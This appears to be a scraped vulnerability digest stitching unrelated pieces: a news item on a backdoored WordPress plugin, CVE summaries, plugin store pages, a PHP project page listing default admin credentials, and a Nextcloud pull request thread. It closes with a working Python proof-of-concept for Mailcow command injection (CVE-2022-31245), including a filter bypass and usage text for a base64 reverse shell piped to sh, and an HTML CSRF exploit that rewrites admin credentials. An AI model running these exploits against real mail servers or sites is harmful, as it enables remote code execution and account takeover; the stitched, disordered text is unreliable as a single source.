Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.
The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.
The backdoor, which is believed to have existed since version 8.9, enables "an

Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.

The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.

The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up.

School Management, developed by an India-based company called Weblizar, is billed as a Wordpress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins.

The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of the plugin. The free version of School Management, which doesn't pack the licensing code, is not impacted.

While the backdoor has since been removed, the exact origins of the compromise remains unclear, with the vendor stating that "they do not know when or how the code came into their software."

Customers of the plugin are recommended to update to the latest version (9.9.7) to prevent active exploitation attempts.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find Backdoor in School Management Plugin for WordPress

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

CVE-2022-29434: Spiffy Calendar

Multiple Authenticated (administrator or higher user role) Persistent Cross-Site Scripting (XSS) vulnerabilities in TMS-Plugins wpDataTables plugin <= 2.1.27 on WordPress via &data-link-text, &data-link-url, &data, &data-shortcode, &data-star-num vulnerable parameters.

CVE-2022-29432: wpDataTables – Tables & Table Charts

Authenticated (admin or higher user role) Local File Inclusion (LFI) vulnerability in Wow-Company's Herd Effects plugin <= 5.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

The Herd Effects is the free marketing tool to set and to post popup notifications on the site. The plugin serves to increase the conversion of web resource and motivate users to perform certain actions. It demonstrates the current or fictitious activity of other visitors and creates a “sense of live queue” effect.

The Herd Effects is a simple and effective solution to increase the conversion on the site. Using a WordPress plugin for social proof will allow you to demonstrate the activity of other users to visitors of the resource. The plugin forms a “herd effect”, attracts attention and motivates to commit various actions.

**Main features**

The Herd Effects will allow you to create a simple template and use it for an administrator-defined list of variable values. Notifications are designed to motivate the user to join the actions of others. Among its features:

*   configuring a template with variables to generate popup notification;
*   set the title;
*   more than 1400+ FontAwesome 5 icons ;
*   insert custom icons;
*   specifying the list of values for text variables;
*   set the minimum and maximum numeric values;
*   set the time interval for stable output of notifications;
*   edit the display on the screens less than the specified resolution;
*   insert an alert on the site using a shortcode.

**Quick Start video**

How to use and create a new social proof notification with Herd Effects plugin for WordPress.

**Pro version**

Enhance the “herd effect” of notifications by installing the Pro version of the plugin on your website:

*   unlimited amount of the notification sets;
*   generating an unlimited amount of the notifications in each set;
*   detailed adjustment of the style of the “herd effect” elements;
*   add a border and set the degree of rounding of its corners;
*   select a position to display each notification;
*   selection of colors for the background, borders, text and icons;
*   randomize the time intervals with which the notifications appear to add more realistic effect;
*   disabling a function of notifications closing by the user and setting auto-close;
*   control of the number of notifications;
*   add animation effects when windows appear and close;
*   connect and configure the output of the link via the notification;
*   display only for a specified period of time (from and to);
*   output of “herd effect” elements for all or separate user groups;
*   set the display depending on the language of the page;
*   edit the display of notifications on all or individual pages of the site, output items through the use of exceptions, IDs and categories.
*   And more…

Preview of Pro version

Buy Pro version

**Can be used for**

*   notification about registration on the site;
*   notifications with information on the purchase of goods;
*   informing visitors of the page about the ordering of the service by other users;
*   notifications about the installation of the application or program;
*   demonstration of the activity of users on the web resource;
*   notifications about subscription to the event of the company;
*   notifications about the mention of the resource in social networks;
*   informing users about real activity on the site and much more.

**Use with other plugins to maximize your results**

*   Popup Box – new WordPress popup plugin
*   Counter Box – powerful creator of counters, timers and countdowns
*   Button Generator – easily Button Builder
*   Herd Effects – fake notifications and social proof plugin
*   Floating Button
*   Side Menu Lite – add sticky fixed buttons
*   Sticky Buttons – floating buttons builder
*   Bubble Menu – circle floating menu
*   Float menu – awesome floating side menu
*   Modal Window – create modal window
*   Wow Skype Buttons
*   Border Menu
*   Slide Menu

**Support**

Search for answers and ask your questions at support center

**Screenshots**

**Installation**

*   Installation option 1: Find and install this plugin in the Plugins -> Add new section of your wp-admin
*   Installation option 2: Download the zip file, then upload the plugin via the wp-admin in the Plugins -> Add new section. Or unzip the archive and upload the folder to the plugins directory /wp-content/plugins/ via ftp
*   Press Activate when you have installed the plugin via dashboard or press Activate in the in the Plugins list
*   Go to Wow Herd Effects section that will appear in your main menu on the left
*   Click Add new to create your first set of notifications
*   Enter title that will appear in the notifications
*   Choose the icon that will appear in the notifications.
*   If you want a custom icon, tick Custom, upload your image via Media – Add new, then insert the link to your image. Recommended icon size is 60×60 pixels.
*   Construct your notifications template in the Text field.
*   Enter the values for your \[name\] and \[city\] variables. You can get the list of names and cities here. Note that you can use these variables for any kind of content, not just names and citites. Just enter any values you want and the plugin will randomly pick the values to be displayed in the notifications. Do not create new lines in the list of your variable, or the notifications will not work! Just enter the values, separated by comma.
*   Enter the minimum and maximum values of the Amount, if you are using it.
*   Click Save
*   Copy and paste the shortcode, such as \[Wow-Herd-Effects id=1\] to where you want the notifications to appear.
*   If you want the notifications to appear everywhere on your site, you can insert it in your header.php, like this: <?php echo do_shortcode('[Wow-Herd-Effects id=1]');?>
*   If you want to insert the shortcode into a widget, use this plugin

**Reviews**

Easy to use. No problems so far. Thanks for an amazing plugin.

Didn't work properly for me using the shortcode on one of my templates and it wasn't worth trying to fix it because the plugin is very restricted in the free version. Can't style it at all so you're left with a plain black look which is nothing but a distraction that looks very fake. Scarily I was putting it on my checkout page and recon this would have scared visitors off rather than pushed them towards the sale.

Why take the time and trouble to lie to those visiting your website when you could use a plugin to help? Herd Effects capitalizes on the emotional and brings out the worst in humanity to increase traffic to your website.

Steve August 31, 2020

This plugin works exactly as specified. It's the easiest to use of all plugins like this. The developer is extremely responsive and support is fantastic. I highly recommend using this plugin for your Herd Effects needs.

I installed and configured the plugin and it unconfigured all the banners on my homepage both on the desktop and on the mobile. Beautiful crap.

Read all 15 reviews

**Contributors & Developers**

“Herd Effects – fake notifications and social proof plugin” is open source software. The following people have contributed to this plugin.

Contributors

*    Wow-Company

**Changelog****5.2.1**

*   Fixed: security issue

**5.2**

*   Added: Export/Import functions
*   Fixed: minor bug

**5.1.3**

*   Fixed: minor bug

**5.1.2**

*   Fixed: minor bug

**5.1.1**

*   Fixed: script download queue

**5.1**

*   Updated: Font Awesome Icons to version 5.14
*   Fixed: minor bugs

**5.0.2**

*   Fixed: include script in footer

**5.0.1**

*   Fixed: custom image

**5.0**

*   Added: Live preview
*   Added: test mode option
*   Added: Unit for location
*   Updated: Admin style
*   Update: Font Awesome Icon to v. 5.12

**4.1**

*   Fixed: display of notification

**4.0.1**

*   Fixed: option ‘Show every (sec)’

**4.0**

*   Added: option for disabling FontAwesome 5 from front-end
*   Added: Content style options
*   Added: Title style options
*   Added: Icon style options
*   Added: Close button size option
*   Changed: Admin Style
*   Optimized: Styles and Scripts (minification and response time reduction)
*   Updated: FontAwesome 5
*   Fixed: Control on the devices

**3.1.3**

*   Fixed: Insert the shortcode

**3.1.2**

*   Fixed: Rounding the amount

**3.1.1**

*   Fixed: minor bugs
*   Fixed: main class

**3.1**

*   Fixed: minor bugs
*   Added: Support page
*   Added: Discount page

**3.0**

*   Added: function hiding menu on mobile
*   Changed: admin style
*   Changed: Up to 3 notifications

**2.3**

*   Fixed: minor bugs.
*   Change: Admin style.

**2.2**

*   Add: Interval display option.
*   Change: Admin style.

**2.1**

*   Fix: Can enter ‘Name’ and ‘City’ in new line.
*   Fix: Verifying access to the folder ‘asset’.
*   Fix: Optimized code.

**2.0**

*   Fixed code
*   Change style

**1.0**

*   Initial release

CVE-2022-29448: Herd Effects – fake notifications and social proof plugin

Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin <= 4.8.6 at WordPress.

CVE-2021-36833: MC4WP: Mailchimp for WordPress

Cross-Site Scripting (XSS) vulnerability in WP Wham's Checkout Files Upload for WooCommerce plugin <= 2.1.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Checkout Files Upload for WooCommerce plugin lets your customers upload files on (or after) WooCommerce checkout.

**Features**

Set field’s **position** on WooCommerce checkout page:

*   Before checkout form.
*   After checkout form.
*   Do not add on checkout.

Set if file upload **is required**.

If you need files to be uploaded after order is created, you can optionally add field to:

*   WooCommerce **Thank You** (i.e. **Order Received**) page.
*   WooCommerce **My Account** page.

Add custom **label** to the field.

Set **accepted file types**.

Set custom Upload and Remove **button labels**.

Set **custom messages**:

*   “Wrong file type”.
*   “Wrong image dimensions” and “Couldn’t get image dimensions”.
*   “File is required”.
*   “File was successfully uploaded”.
*   “No file selected”.
*   “File was successfully removed”.

Optionally set field to show up only if in cart there are selected:

*   **Products**.
*   **Product categories**.
*   **Product tags**.

Add uploaded files to admin and customers **emails**.

Send **additional emails** if user uploads or removes files on “Thank You” or “My Account” pages.

**Customize** the frontend files upload form.

Optionally enable **AJAX form** for file uploads.

Set **max file size** option.

Optionally **validate image dimensions**.

**Feedback**

*   We are open to your suggestions and feedback. Thank you for using or trying out one of our plugins!
*   Drop us a line at www.wpwham.com.

**More**

*   Visit the Checkout Files Upload for WooCommerce plugin page.

1.  Upload the entire plugin folder to the /wp-content/plugins/ directory.
2.  Activate the plugin through the “Plugins” menu in WordPress.
3.  Start by visiting plugin settings at “WooCommerce > Settings > Checkout Files Upload”.

This plugin it might be very helpful if, for some reason, you have to let customers upload files during the checkout.

The free version of this plugin is just brilliant! The UI is very easy to understand, making it pretty straightforward to configure. We needed to have an upload field on the Checkout so customers could attach a PDF file. The file can be included as an actual email attachment, and not just a link. It also has the ability to include the upload field conditionally, meaning you can link it to a specific product on the backend, and it will just show if that product is in cart. I have tested multiple checkout upload plugins over the last few months. This is HANDS DOWN the BEST plugin of its kind on the market.

The free version of the plugin does much more than other paid plugins do. So many possibilities for customisation.

I have been facing a problem from three days on order at checkout file upload attachment not showing in mail .it was working fine before. kindly help me . https://fastprintamman.com/ palce a order and on check out there is file upload that attachment not showing in admin mail

Is it possible to set MINIMUM dimensions for both height and width? Also, the progress meter doesn't seem to actually reflect the upload progress... It just jumps to 100% almost immediately...

Read all 10 reviews

“Checkout Files Upload for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    WP Wham

**2.1.3 – 2022-05-10**

*   FIX: escape filenames on order confirmation/thank you pages.

**2.1.2 – 2021-12-23**

*   FIX: potential XSS vulnerability (thanks to Vlad at Patchstack).
*   FIX: minor display bug in settings due to WooCommerce update.

**2.1.1 – 2021-09-16**

*   UPDATE: PHP 8 now officially supported.
*   UPDATE: updated .pot file for translations.

**2.1.0 – 2021-04-15**

*   NEW: added more options to “validate image dimensions” setting: “greater than or equal”, and “less than or equal”.
*   NEW: added button to delete file attachments on admin “edit order” page. (If you don’t want the ability to delete files, you can use the filter wpwham_checkout_files_upload_allow_admin_delete_files to disable it).
*   FIX: check if server’s temporary directory is writeable. If not, display an error message. (Solves an issue with 0-byte files being uploaded).
*   FIX: bug where sometimes 0-byte files were attached to order emails.
*   UPDATE: for text labels/notices, made it possible for a translated string to take precedence over stored settings. (Previously it was the other way around. This should now make things easier if you use a translation plugin like LocoTranslate, Polylang, etc).
*   UPDATE: performance improvement — load our admin assets only when needed.
*   UPDATE: updated .pot file for translations.

**2.0.4 – 2021-01-12**

*   FIX: clean output buffer before downloads (solves conflict with some 3rd-party plugins which interfere with the output buffer, causing downloads to appear as empty or corrupt).

**2.0.3 – 2020-09-17**

*   UPDATE: display our settings in WC status report.

**2.0.2 – 2020-08-21**

*   FIX: upload button translation issue (removed old label settings, added new ones).
*   UPDATE: updated .pot file for translations.

**2.0.1 – 2020-06-17**

*   FIX: issue with upload button not working in certain themes.
*   FIX: user permissions issue incorrectly preventing downloading of images from the WP admin side.
*   FIX: JS typo.

**2.0.0 – 2020-06-11**

*   NEW: **Breaking Change** the Form (simple) template has been removed, and Form (AJAX) is now the standard template. Form (AJAX) has been the default since v1.4.0 (2018-08-25), so for most people this change will have no effect. However, if you were using Form (simple), or if you had customized either template, please double check your settings to make sure things look correct. Or, you can reset the settings to get a fresh start.
*   NEW: **Breaking Change** in template settings, the variable %field_html% which previously contained BOTH the field html AND the upload button itself, has been split into separate variables %field_html% and %button_html%. Your template settings will be updated automatically to reflect this.
*   NEW: image thumbnails will be shown by default. The image feature has existed since v1.4.0 (2018-08-25), but some people didn’t realize this and/or didn’t know they needed to add %image% into the template to enable it. Now %image% is included in the template by default. If you don’t want this, simply edit your template settings and remove the %image% variable.
*   NEW: show spinner when processing, and prevent checkout form submission before upload is completed.
*   UPDATE: change the way we handle sessions — only start them when needed, not on every page load.
*   UPDATE: extensive code refactoring.
*   UPDATE: updated some styling and text. For example, progress bars (if enabled) are now green.
*   UPDATE: updated .pot file for translations.

**1.5.4 – 2020-01-14**

*   UPDATE: add new filters ‘wpw\_checkout\_files\_upload\_form\_html’ and ‘wpw\_checkout\_files\_upload\_form\_ajax\_html’.
*   UPDATE: wrap checkout page file upload controls in

<

div>.

**1.5.3 – 2019-11-22**

*   UPDATE: bump tested versions

**1.5.2 – 2019-11-15**

*   UPDATE: bump tested versions

**1.5.1 – 2019-09-12**

*   UPDATE: bump tested upto versions

**1.5.0 – 2018-10-08**

*   FIX: php notice
*   UPDATE: updated .pot file for translations

**1.4.5 – 2018-10-01**

*   Dev – [alg_wc_cfu_translate] shortcode added and do_shortcode() is now applied to each file’s “Labels”.

**1.4.4 – 2018-09-13**

*   Dev – Emails – “Additional Emails Options” subsection added.
*   Dev – “Raw” input is now allowed in all textarea admin settings fields.
*   Dev – Code refactoring – “Reset” function re-written.
*   Dev – Code refactoring – custom_number_checkout_files_upload settings type removed.
*   Dev – “Your settings have been saved” admin notice added.

**1.4.3 – 2018-09-10**

*   Dev – “Author URI” updated.

**1.4.2 – 2018-09-10**

*   Dev – “Contributors” updated.

**1.4.1 – 2018-08-27**

*   Fix – %image% in AJAX form fixed on “Thank you” and “My Account” pages.
*   Dev – “Validate image dimensions” options added for each file.
*   Dev – Minor code refactoring.
*   Dev – Minor admin settings restyling.

**1.4.0 – 2018-08-25**

*   Fix – User file download fixed on “Thank you” and “My Account” pages.
*   Dev – %image% replaced value added.
*   Dev – “AJAX form” now is enabled (yes) in settings by default.
*   Dev – Code refactoring.
*   Dev – Minor admin settings restyling.
*   Dev – Plugin URI updated.

**1.3.0 – 2018-06-09**

*   Fix – Case insensitive comparison of the “Accepted file types” options.
*   Fix – Default values fixed for all get_option() calls.
*   Dev – “AJAX form” options added.
*   Dev – “Max file size” options added.
*   Dev – Filter rewritten.
*   Dev – Admin settings – “Reset settings” section added.
*   Dev – Admin settings – Files settings added as separate sections.
*   Dev – Admin settings – Minor changes: restyling; select option type changed to wc-enhanced-select; settings array saved as main class property.

**1.2.0 – 2017-05-10**

*   Fix – Call to undefined function is_shop_manager() error fixed.
*   Dev – WooCommerce v3.x.x compatibility – Order ID – using function instead of accessing property directly.
*   Dev – load_plugin_textdomain moved to constructor from init hook.
*   Dev – Plugin link changed from http://coder.fm to https://wpcodefactory.com.

**1.1.1 – 2016-12-07**

*   Dev – alg_current_filter_priority() modified for compatibility with WordPress since v4.7.
*   Dev – Language (POT) file updated.
*   Dev – Checking for Pro modified.

**1.1.0 – 2016-11-28**

*   Dev – “Form Template Options” settings section added.
*   Dev – Language (POT) file added.
*   Dev – “Emails Options” settings moved to separate section.

**1.0.0 – 2016-09-05**

*   Initial Release.

CVE-2022-29425: Checkout Files Upload for WooCommerce

Sourcecodester Covid-19 Directory on Vaccination System1.0 is vulnerable to SQL Injection via the admin/login.php txtusername (aka Username) field.

Submitted by Walterjnr1 on Monday, March 28, 2022 - 10:03.

****Introduction****

The aim of the study is to design a COVID-19 information management system that will accurately store and retrieve information on covid-19 vaccination in order to control the spread of the pandemic. This project was developed using **PHP Language** as the backend and **MySQL Database**. The application is a web-based platform to verify the vaccination record of the individual online.

It contains modules like:

****About the Covid-19 Directory on Vaccination System****

I developed this project using the following:

*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Bootstrap**

This **Covid-19 Directory on Vaccination System** can be accessed by the Public users and the management. The management has the privilege to access the admin/management panel of the system. The management side of the system requires the users to log system credentials in order to gain access to the records and manage it. The individuals can simply register to the system by filling all the fields that are required at the public site. To verify the individual's vaccination record and status, the user can navigate the site to Verification Panel and enter the Vaccination ID of the person. Upon submitting the Individual's Vaccination ID, the vaccination information of the individual will be shown.

****Features********Public****

*   **Home Page**
*   **Registration Form**
*   **Verification Panel**

****Admin****

*   **Login and Logout**
*   **Manage User Records**
*   **List all Records**
*   **Print Records**
*   **Update Account Credentials**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Open** a browser and **browse** the **PHPMyAdmin. i.e** **http://localhost/phpmyadmin**
5.  **Create** a **new database** naming ****covid19****.
6.  **Import** the provided ****SQL**** file. The file is known as ****covid19.sql**** located inside the **db** folder.
7.  **Browse** the **Covid-19 Directory on Vaccination System** in a **browser**. i.e. ****http://localhost/covid-19-vaccination/**** for the public site and ****http://localhost/covid-19-vaccination/admin**** for the management site.

**Admin Default Access:**

Username: **admin**  
Password: admin123

**DEMO VIDEO:**

That's it. You can now explore the features and functionalities of this **Covid-19 Directory on Vaccination System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

For your research project contact us via Whatsapp on +2348067361023 or email us via: \[email protected\] or visit www.leastpayproject.com.ng

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1214 views

CVE-2022-28531: Design and Implementation of Covid-19 Directory on Vaccination System in PHP Source Code

Nextcloud Deck is a Kanban-style project & personal management tool for Nextcloud, similar to Trello. The full path of the application is exposed to unauthorized users. It is recommended that the Nextcloud Deck app is upgraded to 1.2.11, 1.4.6, or 1.5.4. There is no workaround available.

> I agree that proper hints may be a alternative solution, but i doubt the order of the implementation. This should be done first and then remove any trace that might lead to a solution.

As Lukas mentioned the trace may contain path and folder structures but depending on the server configuration and PHP version may also contain arguments of method calls.

> If one would prioritize clear hints higher than removing all information i wouldn't even have an issue, but in fact by far most of the users will complain at the Android client if an issue occurs.

Your point if of course understandable. Nextcloud offers a hint exception in order to provide user facing texts but that is so far not used in deck unfortunately. I'll open a follow up ticket on how we can improve exception handling in general as we indeed should rather catch them in the controller and return predictable API responses then. However that is unfortunately a larger restructuring task, so this is why this PR was the first take on the topic. I'll have a look if we can get some static analysis that we have running with psalm to get a list of uncatched exceptions that the controllers might throw so we can properly align that in a follow up.

> I have a feeling that we are some kind of first level support / first line of defense and i feel a bit lost if we only are able to comment "sorry, but no idea - ask your million users hoster to enable debug mode for you shrug".

For now I've extended the message that will be returned in non-debug mode to always contain a hint to further request the server administrator for help in addition with the request ID which can then be used to get the actual log entry. This is the same behavior that we have in Nextcloud on pages that throw an exception.

CVE-2022-24906: Keep exceptions http response generic by juliushaertl · Pull Request #3384 · nextcloud/deck

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.

# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Description :The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.# HTTPS Request :POST /obbs/admin/admin-profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 86Origin: http://localhostConnection: closeReferer: http://localhost/obbs/admin/admin-profile.phpCookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3eUpgrade-Insecure-Requests: 1adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=# Poc Html :<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://localhost/obbs/admin/admin-profile.php" method="POST">      <input type="hidden" name="adminname" value="Admin" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="email" value="admin@gmail.com" />      <input type="hidden" name="mobilenumber" value="123" />      <input type="hidden" name="submit" value="" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Tag

#php